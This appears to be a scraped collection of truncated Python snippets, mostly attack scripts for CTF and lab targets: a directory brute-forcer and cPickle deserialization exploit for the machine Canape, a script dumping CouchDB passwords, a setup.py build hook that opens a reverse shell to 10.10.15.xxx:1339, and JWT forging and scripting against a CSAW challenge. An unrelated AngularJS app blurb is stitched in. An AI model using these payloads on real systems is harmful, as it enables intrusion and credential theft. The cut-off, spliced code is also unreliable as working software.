###Custom Dirb Script for Canape
import requests as rq
import sys
url = "http://10.10.10.70/"
homepage = "Welcome to the future home page"
wordlist = "common"
found = []

###Canape cPickle Exploit (run nc -nlvp 1338 separately.)
#Change host/port to your own ip/desired port.
LHOST = "10.10.15.xxx"
LPORT = "1338"
import requests as rq #For posting request
import cPickle #For generating payload
import hashlib #For generating MD5 hash as id
import os #For creating shell object

###Retrieves passwords for Canape CouchDB Users
import requests as rq
url = "http://george:george@localhost:5984/passwords/"
alldocs = rq.get(url+"_all_docs").json()
for i in alldocs["rows"]:
    entry_id = str(i["id"])
    ret = rq.get(url+entry_id).json()

from distutils.command.build_py import build_py as _build_py
from distutils.core import setup
import socket, subprocess, os
class build_py(_build_py):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("10.10.15.xxx",1339))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)

An AngularJS App to view details about a user's GitHub profile. View it at https://georgeom.net/userSearcher/webpage.html
Code spread across the 4 attached files.

import requests as rq
import jwt
tokenData = {
    'exp': 1538956189,
    'iat': 0,
    'sub': 0,
    'admin': True
}

import requests as rq
for i in range(1,1000):
    headers = {
        "bring_back_random_click":"hhhhhhhhhh",
    }
    req = rq.get("http://web.chal.csaw.io:10106/default/", headers=headers)
    if len(req.text) != 243:
        print req.text[:-1]
        break

import requests as rq
import json
url = "http://web.chal.csaw.io:10106/"
def register(userpass):
    global auth
    if len(userpass) < 8:
        return "Please enter at least 8 characters."
    details = {
        "username":userpass,

def stats():
    global auth
    userinfo = rq.get("http://web.chal.csaw.io:10106/user", headers=auth).json()
    userclickers = json.loads(rq.get("http://web.chal.csaw.io:10106/clicker/user", headers=auth).json().replace("'",'"'))
    print("##########\nStats for "+userinfo['username']+":")
    print("##########")
    print("Money: "+str(userinfo['money']))
    print("##########\nClicker Name | Clicker Value | Clicker Price\n"+("----------"*5))
    for count, i in enumerate(userclickers):
        print(i['name']+" | "+str(i['value'])+" | "+str(i['price']))

def click(clicker):
    global authorization
    data={'name':clicker}
    req = rq.post("http://web.chal.csaw.io:10106/clicker/click", headers=authorization, json=data)
    if req.json()['status'] == "success":
        return "Success!"
    elif req.json()['message'] == "Clicker not owned":
        return "Clicker not owned."
    else:
        return "Clicker does not exist."